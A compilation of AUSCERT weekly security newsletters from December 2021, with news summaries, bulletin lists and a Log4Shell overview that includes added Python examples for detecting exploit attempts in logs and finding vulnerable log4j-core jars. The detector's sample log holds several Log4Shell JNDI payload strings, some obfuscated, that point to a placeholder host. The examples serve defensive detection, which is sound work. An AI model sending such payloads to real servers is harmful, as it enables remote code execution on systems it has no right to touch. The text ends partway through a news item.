AUSCERT Week in Review for 17th December 2021

Greetings,

With only seven sleeps until Christmas, the realisation that the end of the year is upon us has well and truly set in!

A reminder of our scheduled shutdown over the Christmas and New Year period: AUSCERT will be closed from Thursday, December 23rd until Monday, January 3rd 2022. We will reopen on Tuesday, January 4th 2022. The auscert@auscert.org.au mailbox will not be monitored during this period. However, we will staff the 24/7 member incident hotline as usual, so do call us for any urgent matters during this period.

If you’re looking for something to do over the break, don’t forget the Call for Presentations for AUSCERT2022 is OPEN! We’re looking for something unique, a great story or something new that can be shared with our attendees. The closing date for submissions is January 10th, so be sure to get your idea to our committee to ensure feedback can be provided by the final deadline of January 30th.

Also, AUSCERT is hiring, so if you’re interested in infrastructure, putting together security solutions and working collaboratively with cyber security analysts, brush off your resume and send it to us over the break!

Something we have been reminded of this past week with Log4j is that the world of cyber doesn’t have holidays and we must always remain vigilant. A recent blog from Seriously Risky Business provides a great overview of the situation and suggests how future occurrences of similar incidents can be avoided. Another blog post, this time from Rapid7, highlights how threat actors seek to take advantage of large-scale vulnerabilities such as Log4j, often working just as hard as those trying to remedy the situation, but with the aim of exploiting the vulnerability.

As this is the last Week In Review before Christmas, and with a lot of folk switching off for a well-earned break, the team at AUSCERT wanted to wish everyone a safe and happy Christmas and Festive Season and all the very best for 2022.

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation
Date: 2021-12-11
Author: Microsoft Security Blog

[This article is focused on the use of Microsoft security products to mitigate exploits. See also ASB-2021.0244.2, published December 10.]

Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog.

Bugs in billions of WiFi, Bluetooth chips allow password, data theft
Date: 2021-12-13
Author: Bleeping Computer

Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component. Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation.

Second Log4j vulnerability discovered, patch already released
Date: 2021-12-15
Author: ZDNet

A second vulnerability involving Apache Log4j was found on Tuesday after cybersecurity experts spent days attempting to patch or mitigate CVE-2021-44228. The description of the new vulnerability, CVE-2021-45046, says the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was “incomplete in certain non-default configurations.” “This could allow attackers… to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack,” the CVE description says.

Why Companies Shouldn’t Shame Employees Who Fall for Hacking Scams
Date: 2021-12-06
Author: Wall Street Journal

[This article may be behind a paywall for some readers]

The implications of our survey were clear: Shame is similar to a boomerang that will come back to hurt the organization, as well as harming the employee. Managers should deal with the mistake, but not reject the employee. If employees feel that their personhood is being attacked, they will respond defensively. Shaming results in a lose-lose outcome. Employees can be an organization’s greatest asset when it comes to defeating the efforts of cybercriminals. Using shame as a behavior modification tool squanders that potential. And that’s the real shame.

Google pushes emergency Chrome update to fix zero-day used in attacks
Date: 2021-12-13
Author: Bleeping Computer

Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild. “Google is aware of reports that an exploit for CVE-2021-4102 exists in the wild,” the browser vendor said in today’s security advisory. Although the company says this update may take some time to reach all users, the update has already begun rolling out Chrome 96.0.4664.110 worldwide in the Stable Desktop channel.

Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery
Date: 2021-12-14
Author: Threat Post

Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications. The patch came as part of the computing giant’s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft’s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.

Australia to establish youth advisory council for countering online child exploitation
Date: 2021-12-15
Author: ZDNet

Australia will create a new panel consisting of Australian youths and young adults that will provide consultation to industry and government about how to approach regulating online platforms. “Young people know better than anyone about the good, the bad and the plain ugly that exists in the online world,” Prime Minister Scott Morrison said. “They are the first generation of Australians to grow up living simultaneously in both the real and digital worlds, and they are always at the forefront of new technologies.

Visa pilots enumeration attack prevention requirement in Australia
Date: 2021-12-15
Author: IT News

Visa has chosen Australia as the first country worldwide where all “e-commerce payment providers” must have botnet detection capabilities in place by October to mitigate the threat posed by enumeration attacks. The payments giant said it could not fight a rise in enumeration attacks alone and needed the assistance of the entire payments ecosystem.

ESB-2021.4192 – apache-log4j2: Execute arbitrary code/commands – Remote/unauthenticated
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled

ESB-2021.4268 – Safari: Execute arbitrary code/commands – Remote with user interaction
Processing maliciously crafted web content may lead to arbitrary code execution in the Safari browser

ASB-2021.0245 – ALERT Microsoft Windows: Multiple vulnerabilities
Microsoft has released its monthly security patch update, which resolves 38 vulnerabilities across their products

ASB-2021.0252 – ALERT Microsoft Edge (Chromium-based): Multiple vulnerabilities
Microsoft addressed a Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability in their newest update

ASB-2021.0253 – Azure Products: Multiple vulnerabilities
Microsoft states “Successful exploitation allows for arbitrary code execution in the targeted application”

Stay safe, stay patched and Merry Christmas and a Happy New Year!

The AUSCERT team

Log4Shell-Logjam Overview

Picture credit: Lunasec[1]

TLDR; Patch, check your patches work, check logs for attempts and possible compromise.

Log4Shell is a tag used by Lunasec[1] to describe the vulnerability in Apache Log4j2 that was disclosed abruptly by a tweet[2] and a GitHub repo. This sudden announcement alerted security professionals to work in a short time frame to protect systems and to stop other interested parties discovering, compromising and potentially taking over systems. Security groups alerted through the above included computer emergency response teams, which recognised the impact and came out with early advisories[3][4][5] that are either being updated or are being referenced by newer advisories[6].

The attack surface was of prime concern and security professionals were exchanging ways to detect it through various third party search results. One of the lists of the attack surface that was published early showed that Log4Shell or LogJam would affect a large number of systems[7][8]. Ways to detect affected servers were refined into a script[9][10] and other entities also released tools to detect vulnerable servers through first party scanning[11][12][13]. First party scanning is not of concern but unauthorised second party scanning is. This activity was eventually detected[14], and exploit payloads soon followed[15].

The manner in which the vulnerability was disclosed gave a short time frame for the naming and grading. This was evident as the PSIRT initially only had release candidates[16][17], which were later checked, with reports that both had to be used[18]. The vulnerability was later allocated CVE-2021-44228[19] and carried the PSIRT’s analysis[20][21] of a CVSSv3 base score of a perfect 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Before a full patch was available from the PSIRT[22], mitigations were collated and a vaccine made available[23][24] to provide an easy way to mitigate[24] the unauthorised second party scanning attempts to drop a malicious payload. No doubt there will be more numerous and extensive reports[26][27][28][29][30][31][32][33][34][35] made available by noted security organisations, as well as a plethora of resources listed to help[36][37], but the advice right now is as the TLDR: check your version[38][39], patch, check your patch, check your logs for attempts and possible compromise[40], and take remediation steps if any IoCs show up[41][42][43][44][45][46].

In a time span no longer than a week, CVE-2021-44228 has gone from proof of concept drop to internet-wide scans to carrying crypto-coin miner payloads to now being found to carry ransomware payloads.[47][48]

Finally, if your weekend was thought to be hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers[49][50] who maintain a piece of code that the internet has come to depend on so much. These three volunteers have worked very hard getting us a patch as soon as possible.[51] As well, we would like to thank all the contributors that have made this article possible by submitting to us relevant links and articles.
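The overview notes that second party scanning was eventually recognised in server logs[14]. What that check looks like in practice is shown by the following added example, which is not code from this post or from any of the detection tools it cites. The detector URL-decodes each access-log line and unwraps the nested lookups that Log4j itself would resolve (${lower:x}, ${upper:x} and ${::-x}) before looking for a jndi: lookup, so that trivially encoded probes are not missed while an innocent ${date} is not flagged. The log lines, the reserved example.invalid hostname and the set of obfuscation forms handled are assumptions of the example.

```python
"""
Added example (not from the AUSCERT post or the tools it references):
flag Log4Shell lookup attempts in web-server access-log lines.

Assumptions: combined log format, and only the lookup forms below are
unwrapped. Sample log lines are constructed; example.invalid is a reserved
placeholder hostname.
"""
import re
from typing import Iterable, List, Tuple
from urllib.parse import unquote

# ${lower:x} and ${upper:x} both evaluate to the character x (with a case
# change we can ignore, because the final match is case-insensitive).
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}$]{1,3})\}", re.IGNORECASE)
# ${::-x} is a default-value lookup with an empty key and evaluates to x.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^:{}]*::-([^}$]{1,3})\}")
# What remains once the noise has been stripped away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(text: str, max_rounds: int = 10) -> str:
    """URL-decode and unwrap nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = unquote(text)                        # %24%7B -> ${ (also handles double encoding)
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), new)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_attempts(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalised line) for every line with a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalised = normalise(line)
        if _JNDI.search(normalised):
            hits.append((number, normalised))
    return hits


# Constructed sample log lines: one benign request, four probes in the
# User-Agent or query string, and one benign request containing a different lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '198.51.100.7 - - [12/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://example.invalid/a}"',
    '198.51.100.7 - - [12/Dec/2021:03:14:12 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.7 - - [12/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}ndi:rmi://example.invalid/a}"',
    '10.0.0.9 - - [12/Dec/2021:03:15:00 +0000] "GET /search?q=%24%7Bdate%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for number, normalised in find_attempts(SAMPLE_LOG):
        print(f"line {number}: {normalised}")
```

Run against a real access log, feed the file object to find_attempts and pivot on the source address and timestamp of each hit; a hit only proves an attempt was logged, so the follow-up is the host-side check for compromise that the TLDR calls for.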
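The first step of the TLDR, checking your version, is shown below as an added example that is not code from this post, the Apache PSIRT or any of the cited tools. It walks a directory tree for log4j-core jars, reads each jar's Implementation-Version from its manifest, and reports whether the version is below an assumed fixed release; it also records whether the JndiLookup class is still present, because deleting that class from the jar was the published workaround for installations that could not upgrade. The 2.16.0 threshold (set it to whatever the PSIRT advisory[21] currently lists), the filename pattern and the sample jars the demo builds are assumptions; shaded or renamed jars are not found by a filename match.

```python
"""
Added example (not from the AUSCERT post or the Apache PSIRT): locate
log4j-core jars under a directory and classify each by manifest version and
by whether JndiLookup.class is present.

Assumptions: jars are named log4j-core-<version>.jar, and the fixed version
to compare against is 2.16.0 (adjust to the current PSIRT advisory).
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME = re.compile(r"^log4j-core-(\d+(?:\.\d+)*)\.jar$")
ASSUMED_FIXED = (2, 16, 0)


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def manifest_version(jar: zipfile.ZipFile) -> Optional[str]:
    """Read Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        text = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in text.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def assess_jar(path: str, min_fixed: Tuple[int, ...] = ASSUMED_FIXED):
    """Return (path, version, jndi_lookup_present, status) for one jar."""
    with zipfile.ZipFile(path) as jar:
        version = manifest_version(jar)
        if version is None:  # fall back to the version in the file name
            match = JAR_NAME.match(os.path.basename(path))
            version = match.group(1) if match else None
        jndi_present = JNDI_LOOKUP_CLASS in jar.namelist()
    if version is None:
        status = "unknown-version"
    elif parse_version(version) >= min_fixed:
        status = "ok"
    elif not jndi_present:
        status = "mitigated-class-removed"  # old version, but the lookup class is gone
    else:
        status = "vulnerable"
    return path, version, jndi_present, status


def scan_tree(root: str, min_fixed: Tuple[int, ...] = ASSUMED_FIXED) -> List[tuple]:
    """Walk root and assess every file that looks like a log4j-core jar."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if JAR_NAME.match(name):
                results.append(assess_jar(os.path.join(dirpath, name), min_fixed))
    return results


def build_sample_tree() -> str:
    """Constructed test data: three fake jars, not real Log4j artifacts."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    samples = [
        ("app1/lib/log4j-core-2.14.1.jar", "2.14.1", True),   # unpatched
        ("app2/lib/log4j-core-2.14.1.jar", "2.14.1", False),  # class removed
        ("app3/lib/log4j-core-2.16.0.jar", "2.16.0", True),   # fixed release
    ]
    for relative, version, with_jndi in samples:
        path = os.path.join(root, relative)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF",
                         f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
            if with_jndi:
                jar.writestr(JNDI_LOOKUP_CLASS, b"")  # placeholder, real entry is bytecode
    return root


def demo() -> Dict[str, str]:
    """Scan the constructed tree and map relative jar path -> status."""
    root = build_sample_tree()
    return {os.path.relpath(path, root).replace(os.sep, "/"): status
            for path, _, _, status in scan_tree(root)}


if __name__ == "__main__":
    for jar_path, status in sorted(demo().items()):
        print(f"{status:24} {jar_path}")
```

Point scan_tree at an application root rather than the demo tree to use it for real; anything reported as unknown-version or mitigated-class-removed still deserves a manual look, and the scan says nothing about copies of Log4j bundled inside other archives, which is where the hash lists[37] and vendor advisories[35] come in.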
[1] Lunasec Advisory https://www.lunasec.io/docs/blog/log4j-zero-day/
[2] Tweeted 0-Day https://twitter.com/P0rZ9/status/1468949890571337731
[3] NZCERT https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
[4] AUSCERT ASB https://portal.auscert.org.au/bulletins/ASB-2021.0244.2
[5] SingCERT https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070
[6] AUSCERT ESB https://portal.auscert.org.au/bulletins/ESB-2021.4186
[7] Attack Surface https://github.com/YfryTchsGD/Log4jAttackSurface
[8] Randori Blog https://www.randori.com/blog/cve-2021-44228/
[9] log4j_rce_check https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
[10] Log4j2Scan https://github.com/whwlsfb/Log4j2Scan
[11] Qualys Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell
[12] SocPrime https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/
[13] Imperva https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/
[14] Log4j RCE Attempts https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
[15] Cloudflare Blog https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
[16] PSIRT rc1 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
[17] PSIRT rc2 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
[18] CyberKendra https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
[19] NVDB https://nvd.nist.gov/vuln/detail/CVE-2021-44228
[20] RecordedMedia https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/
[21] PSIRT Advisory https://logging.apache.org/log4j/2.x/security.html
[22] PSIRT Download https://logging.apache.org/log4j/2.x/download.html
[23] Cybereason Blog https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228
[24] Cybereason Vax https://github.com/Cybereason/Logout4Shell
[25] DarkReading https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates
[26] PaloAlto https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
[27] Cloudflare Blog https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
[28] Cloudflare Blog https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
[29] Sygnia Advisory https://blog.sygnia.co/log4shell-remote-code-execution-advisory
[30] ISC SANS Diary https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/
[31] ISC SANS Diary https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
[32] Crowdstrike https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
[33] Bleeping Computer https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
[34] Trusted Sec https://www.trustedsec.com/blog/log4j-playbook/
[35] Bleeping Computer https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
[36] Reddit List of resources on log4j https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/
[37] CVE-2021-44228-Log4Shell-Hashes https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
[38] NCSC-NL https://github.com/NCSC-NL/log4shell
[39] BlueTeam CheatSheet https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
[40] Log4ShellDetector https://github.com/Neo23x0/log4shell-detector
[41] Bazaar https://bazaar.abuse.ch/browse/tag/log4j
[42] URLHaus https://urlhaus.abuse.ch/browse/tag/log4j
[43] Threatfox https://threatfox.abuse.ch/browse/tag/log4j
[44] CuratedIntel https://github.com/curated-intel/Log4Shell-IOCs
[45] Microsoft Guidance https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
[46] TryHackme https://tryhackme.com/room/solar
[47] Twitter https://twitter.com/80vul/status/1470272820571963392?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet
[48] Twitter https://twitter.com/ankit_anubhav/status/1470648109625536515
[49] Twitter “@FiloSottile” https://twitter.com/FiloSottile/status/1469441487175880711
[50] Twitter “@matthew_d_green” https://twitter.com/matthew_d_green/status/1469715416549367812
[51] ITNews https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914

AUSCERT Week in Review for 10th December 2021

Greetings,

The Call for Presentations for the AUSCERT2022 Conference is NOW OPEN. The Conference will be held as a hybrid event from Tuesday, 10th May – Friday, 13th May 2022 at The Star Gold Coast, Broadbeach and online via the OnAIR Virtual Conferencing Platform. If you or someone you know has a great story to tell, we would like to hear it! It could be something unique to say on a topic of interest to our community or an extraordinary project that others would benefit from. Perhaps it’s a clever way of optimising a process that is otherwise time-consuming? Submit to AUSCERT2022. Call for Presentations and Tutorials, due in January 2022. Submit by 10 January to receive feedback from our committee for further improvements before the final deadline of 30 January.

AUSCERT was proud to be a Bronze sponsor of the 2021 Australian Women in Security Awards, which were handed out earlier this week. Once a year, the security industry gathers to celebrate and raise the profile of the Australian IT Security, Cyber, and Protective Security industry to inspire young women and men to consider a career in this sector. This is done by honouring their accomplishments, value, and contributions to the Australian market and giving them the recognition they deserve.

This week, it was announced that Queensland borders would open to the rest of Australia on Monday, December 13 at 1:00am. As part of the ongoing focus on community safety, we’re all being reminded and encouraged to check in when out and about in the community. With the growth in the number of phishing messages delivered to smart phones, it’s imperative to use the official apps from the respective government bodies when visiting venues and using services (such as ride share).

Queensland government energy generator says ransomware attack not state-based
Date: 2021-12-09
Author: ZDNet

Queensland government-owned energy generator CS Energy provided an update on Wednesday that those behind its November ransomware incident were unlikely to be a state-based actor. On the same morning, Sydney’s Daily Telegraph landed with a front page claiming China was behind the incident. Thanks to the appearance of CS Energy on a leak site listing victims of Conti ransomware run by the Wizard Spider group for the purposes of double extortion, the claims made by News Limited would appear to be unfounded.

Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Date: 2021-12-07
Author: Bleeping Computer

In a concerning development, the notorious Emotet malware now installs Cobalt Strike beacons directly, giving immediate network access to threat actors and making ransomware attacks imminent. Emotet is a malware infection that spreads through spam emails containing malicious Word or Excel documents. These documents utilize macros to download and install the Emotet Trojan on a victim’s computer, which is then used to steal email and deploy further malware on the device. Historically, Emotet would install the TrickBot or Qbot trojans on infected devices. These Trojans would eventually deploy Cobalt Strike on an infected device or perform other malicious behaviour.

SolarWinds hackers have a whole bag of new tricks for mass compromise attacks
Date: 2021-12-07
Author: Ars Technica

Almost exactly a year ago, security researchers uncovered one of the worst data breaches in modern history, if not ever: a Kremlin-backed hacking campaign that compromised the servers of network management provider SolarWinds and, from there, the networks of 100 of its highest-profile customers, including nine US federal agencies.

[…]

The latest reminder of the group’s proficiency comes from security firm Mandiant, which on Monday published research detailing Nobelium’s numerous feats—and a few mistakes—as it continued to breach the networks of some of its highest-value targets.

Hackers infect random WordPress plugins to steal credit cards
Date: 2021-12-08
Author: Bleeping Computer

According to a new report by Sucuri, hackers performing credit card theft are first hacking into WordPress sites and injecting a backdoor into the website for persistence. These backdoors allow the hackers to retain access to the site, even if the administrator installs the latest security updates for WordPress and installed plugins. When the attackers use the backdoor in the future, it will scan for a list of administrator users and use their authorization cookie and current user login to access the site.

AWS outage impacts Ring, Netflix, and Amazon deliveries
Date: 2021-12-07
Author: Bleeping Computer

Amazon AWS in the US-EAST-1 Region is suffering an outage that affected numerous online services, including Ring, Netflix, Amazon Prime Video, and Roku. The ongoing outage started at approximately 12 PM EST and is caused by problematic network equipment affecting the US-EAST-1 AWS region, which feeds a good portion of the connectivity for people in the northeastern part of the United States.

FBI warning: Hackers targeting flaw in Zoho ManageEngine ServiceDesk Plus
Date: 2021-12-03
Author: ZDNet

The FBI and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) are warning about the ‘active exploitation’ of a bug in Zoho ManageEngine ServiceDesk Plus before 11306. “Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration,” CISA and the FBI note about the vulnerability tracked as CVE-2021-44077.

Cryptocurrency scams targeting Australians as scammers bank more than $100 million
Date: 2021-12-08
Author: ABC News

Australian Federal Police say cryptocurrency scams have “exploded” during the pandemic, with new figures from the Australian consumer watchdog showing a 172 per cent increase in losses between January and November this year, totalling $109 million. The scams are run by global syndicates, and the money trail is murkier than ever.

A mysterious threat actor is running hundreds of malicious Tor relays
Date: 2021-12-03
Author: The Record

Since at least 2017, a mysterious threat actor has run thousands of malicious servers in entry, middle, and exit positions of the Tor network in what a security researcher has described as an attempt to deanonymize Tor users. Tracked as KAX17, the threat actor ran at its peak more than 900 malicious servers part of the Tor network, which typically tends to hover around a daily total of up to 9,000-10,000. Some of these servers work as entry points (guards), others as middle relays, and others as exit points from the Tor network.

ASB-2021.0244 – ALERT log4j: Execute arbitrary code/commands – Remote/unauthenticated
log4j, a popular Java logging package, has been reported to be vulnerable to remote code execution

ESB-2021.4107 – NGINX ModSecurity WAF: Denial of service – Existing account
An attacker using specifically formatted JSON messages can cause high resource utilization and potentially denial-of-service (DoS) on NGINX ModSecurity WAF

ESB-2021.4120 – openssh: Increased privileges – Existing account
OpenSSH privilege escalation vulnerability fixed in the newest SUSE security update

ESB-2021.4131 – Wireshark: Denial of service – Remote with user interaction
Wireshark network protocol analyzer tool released a new update that fixes 8 vulnerabilities

ESB-2021.4160 – Firefox and Firefox ESR: Multiple vulnerabilities
An incorrect type conversion of sizes from 64-bit to 32-bit integers allowed an attacker to corrupt memory, leading to a potentially exploitable crash

Stay safe, stay patched and have a good weekend!

The AUSCERT team

AUSCERT Week in Review for 3rd December 2021

Greetings,

This Saturday marks three weeks until Christmas Day, a date that seems to be rapidly approaching! The festive season can often feel as though you’re being pulled in multiple directions. Some organisations slow down whilst others maintain and increase their activity as the year nears its end. Whatever the industry or however busy you may be, the following article provides Twelve Tips for Christmas Cybersecurity that apply to both our personal and professional lives.

There has been a growing belief that nobody should have the ability to hide behind anonymous social media accounts, engaging in inappropriate commentary and conduct. As a result, the Australian government this week drafted anti-trolling legislation that will aim to clarify who is responsible for content published online. Requirements such as a mandatory complaints process and a mandate for social media companies to provide names and contact details are just some of the suggested laws that could be introduced as soon as early 2022.

The scheduled rollout of mandatory two-factor authentication (2FA) by tech giant Google will be activated automatically next Thursday, November 9. You can customize your 2FA for either personal or business accounts with the options available on the Google Workspace Admin page, which also contains additional information about the 2FA requirements, processes and support.

Lastly, The University of Queensland and BLUE Inc. (Tokyo) are partnering to offer two half-day workshop seminars to address complex cyber security challenges and engage researchers, industry experts and students. Industry professionals from both countries will be presenting across four themes aimed at promoting and sharing game-changing interdisciplinary research between Australia and Japan. The workshops will be held in-person and online via Zoom on Wednesday 8 December and Wednesday 15 December. Click on your preferred date to learn more and register.

Microsoft Exchange servers hacked to deploy BlackByte ransomware
Date: 2021-12-01
Author: Bleeping Computer

The BlackByte ransomware gang is now breaching corporate networks by exploiting Microsoft Exchange servers using the ProxyShell vulnerabilities. ProxyShell is the name for a set of three Microsoft Exchange vulnerabilities that allow unauthenticated, remote code execution on the server when chained together.

Panasonic confirms cyberattack and data breach
Date: 2021-11-30
Author: ZDNet

Tech manufacturing giant Panasonic has confirmed that its network was accessed illegally this month during a cyberattack. In a statement released on Friday, the Japanese company said it was attacked on November 11 and determined that “some data on a file server had been accessed during the intrusion.” “After detecting the unauthorized access, the company immediately reported the incident to the relevant authorities and implemented security countermeasures, including steps to prevent external access to the network,” Panasonic said in a statement. “In addition to conducting its own investigation, Panasonic is currently working with a specialist third-party organization to investigate the leak and determine if the breach involved customers’ personal information and/or sensitive information related to social infrastructure.”

CISA Releases Guidance on Securing Enterprise Mobile Devices
Date: 2021-11-29
Author: SecurityWeek

The United States Cybersecurity and Infrastructure Security Agency (CISA) last week published a Capacity Enhancement Guide to help organizations secure mobile devices and their access to enterprise resources. The Enterprise Mobility Management system checklist is meant to help businesses mitigate vulnerabilities and increase overall enterprise protections by implementing a series of best practices for securing enterprise-managed mobile devices.

Microsoft Defender scares admins with Emotet false positives
Date: 2021-11-30
Author: Bleeping Computer

Microsoft Defender for Endpoint is currently blocking Office documents from being opened and some executables from launching due to a false positive tagging the files as potentially bundling an Emotet malware payload. Windows system admins are reporting that this is happening since updating Microsoft’s enterprise endpoint security platform (previously known as Microsoft Defender ATP) definitions to version 1.353.1874.0. When triggered, Defender for Endpoint will block the file from opening and throw an error mentioning suspicious activity linked to Win32/PowEmotet.SB or Win32/PowEmotet.SC.

Hackers could steal encrypted data now and crack it with quantum computers later, warn analysts
Date: 2021-12-01
Author: ZDNet

Beijing-backed hackers might soon start trying to steal encrypted data — such as biometric info, the identities of covert spies, and weapons designs — with a view to decrypting it with a future quantum computer, according to analysts at US tech consultancy Booz Allen Hamilton (BAH). “In the 2020s, Chinese economic espionage will likely increasingly steal data that could be used to feed quantum simulations,” the analysts write in the report Chinese Threats in the Quantum Era. At risk are data protected by the current algorithms underpinning public-key cryptography, which some fear may be rendered useless for protecting data once quantum computers become powerful enough.

Prediction Season: What’s in Store for Cybersecurity in 2022?
Date: 2021-12-01
Author: Security Week

The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.

More than 300,000 Play Store users infected with Android banking trojans
Date: 2021-11-29
Author: The Record

More than 300,000 Android users were infected with banking trojans after installing apps from the official Google Play Store over the past few months, mobile security firm ThreatFabric said today. The malicious code was hidden inside fully functional apps that operated as QR code scanners, PDF scanners, security tools, fitness apps, and two-factor authenticators. But besides the legitimate functionality they offered, these apps also included a special module called a “loader.” In the cybersecurity field, loaders are small pieces of malware that are hidden inside an app. They typically contain very little and very benign functionality, such as the ability to connect to a remote server to download and run additional code.

IKEA email systems hit by ongoing cyberattack
Date: 2021-11-26
Author: Bleeping Computer

